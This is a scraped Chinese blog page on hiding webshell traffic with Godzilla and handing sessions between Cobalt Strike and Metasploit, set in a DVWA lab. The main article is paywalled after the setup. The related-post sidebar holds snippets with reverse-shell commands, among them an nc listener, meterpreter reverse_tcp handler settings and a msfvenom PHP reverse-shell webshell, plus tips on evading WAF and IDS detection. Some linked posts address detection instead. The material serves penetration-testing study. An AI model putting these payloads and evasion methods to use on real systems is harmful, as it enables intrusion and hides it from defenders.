webshell流量隐蔽&CS和MSF联动

最新推荐文章于 2024-06-10 08:38:28 发布
最新推荐文章于 2024-06-10 08:38:28 发布
阅读量2k 收藏 3
点赞数
文章标签: 数据库 github shell 安全 zookeeper
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/115301801
版权
本文介绍了如何利用DVWA靶场进行webshell上传,通过哥斯拉工具进行流量加密和特征伪装,以防止被安全设备检测。然后详细阐述了如何使用哥斯拉连接webshell并修改User-Agent,确保隐蔽性。接着展示了如何利用Metasploit Framework(MSF)和Cobalt Strike(CS)进行shell反弹,以及在MSF和CS之间转移会话的过程,为内网渗透提供了一种实践方法。
摘要由CSDN通过智能技术生成

文章来源|MS08067 内网安全知识星球

本文作者:BlackCat(Ms08067内网安全小组成员)

内网纵横四海  认准Ms08067

环境:

Windows:  192.168.93.3
VPS:x.x.x.x
⼯具:CobaltStrike4.1、MSF、哥斯拉v2.92

实验场景DVWA靶场,通过靶场的上传漏洞位置,上传webshell

然后⽤冰蝎或者其他webshell⼯具连接:

冰蝎下载地址:

https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6
最低0.47元/天 解锁文章
Ms08067安全实验室
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用webshell反弹提权
weixin_45945976的博客
10-18 400
利用php大马反弹进行提权 准备工具:php大马一个 NC.exe PHP大马反弹连接—选择windows–自定义端口 nc.exe -vv -l -p 4444
WAF攻防-菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知
今天是几号的博客
04-12 1682
使用Proxifier进行流量转发至Burp抓包分析(使用Wireshake也可以)# ==冰蝎3-流量&绕过&特征&检测== **面试必问的,别问我怎么知道的** 冰蝎利用了服务器端的脚本语言加密功能,通讯的过程中, 消息体内容采用 AES 加密,基于特征值检测的安全产品无法查出 ## 特征 密钥使用连接密码的md5结果的前16位 如果对方使用的默认密码rebeyond,那么密钥就是e45e329feb5d925b,那么这也算是一个特征
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
最新发布
qq_53058639的博客
06-10 1219
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
MSFCS联动
GoDunTong's Blog
04-08 4198
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
CS + MSF 联动
A_dmin的博客
12-23 1602
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
2021-06-30csmsf联动派生会话shell
qq_45290991的博客
06-30 671
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 12345 2、...
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
msf生成webshell_生成常用的msf
weixin_39759441的博客
12-22 728
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
基于深度学习的Webshell流量检测技术研究(毕设&课设论文参考).caj
02-23
资源说明 【1】资源属于对应项目写的论文,写作规范、逻辑紧密、用语专业严谨,内容丰富饱满,可读性强,很适合对该领域的初学者、工程师、在校师生、毕业生等下载使用。 【2】论文适合学习借鉴参考,为您的类似项目...
网络攻击之-Webshell流量告警运营分析篇
村中少年的专栏
01-01 1358
通过流量数据包从webshell上传,webshell注入,webshell连接通信,Webshell工具利用的角度进行阐述Webshell的防御,告警研判以及处置建议
Cobalt Strike与MSF联动
weixin_42035825的博客
03-29 2904
cs的会话---->msf的会话 注意:必须安装java 我这里使用的是cs4.0版本的,所以后面的有些东西会和以前的有些差异,但并不影响。 进入目录,启动cs的服务端,命令格式:./teamserver ip 密码; 客户端有两种一种是windows版,一种是linux版。这里采用linux版本,但都必须是在java环境里面; 启动客户端: host:服务器端的ip; port:服务器...
msf联动cs
hmysn的博客
12-31 2135
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
MSF建立webshell后门,并监听端口建立session连接
热门推荐
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
流量特征分析——蚁剑、菜刀、冰蝎
Sgirll的博客
07-22 6085
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。网络管理员和安全专家可以根据这些特征来识别和监测潜在的攻击活动,并及时采取相应的防护措施。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。本文将重点研究菜刀、蚁剑和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。蚁剑(AntSword)是一款功能强大的跨平台渗透测试工具,被广泛用于攻击和渗透测试活动。
内网安全-域横向CS&MSF联动及应急响应初识
xhscxj的博客
03-25 4069
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上csmsfcs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 335
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
常见Webshell&重大漏洞的流量特征(附解密流量工具)
Python_0011的博客
11-10 6259
攻防演练中,经常会看到一些加密的流量,又分不清楚是不是误报,本文总结了一些常见的流量特征,附流量解密工具。
MSF&CobaltStrik流量隐藏
qq_45434762的博客
12-05 1334
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
webshell流量特征分析
04-08
根据提供的引用内容,我们可以通过分析URL、参数和头部信息来判断是否存在webshell流量[^1]。常见的webshell流量特征包括: 1. URL特征:检查URL中是否包含可疑的文件名、路径或参数,例如常见的webshell文件名、路径或参数。 2. 参数特征:分析请求中的参数,查找是否存在可疑的命令执行、文件上传或代码执行等操作。例如,检查参数中是否包含eval、exec、system等关键字。 3. 头部信息特征:检查请求的头部信息,查找是否存在异常的User-Agent、Referer或Cookie等字段。例如,检查User-Agent是否为常见的webshell工具的标识。 通过以上特征分析,可以帮助我们检测和识别webshell流量。然而,需要注意的是,webshell流量特征是不断变化的,攻击者会不断改变webshell的代码和流量特征来规避检测。因此,及时更新和使用最新的webshell检测规则和工具是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值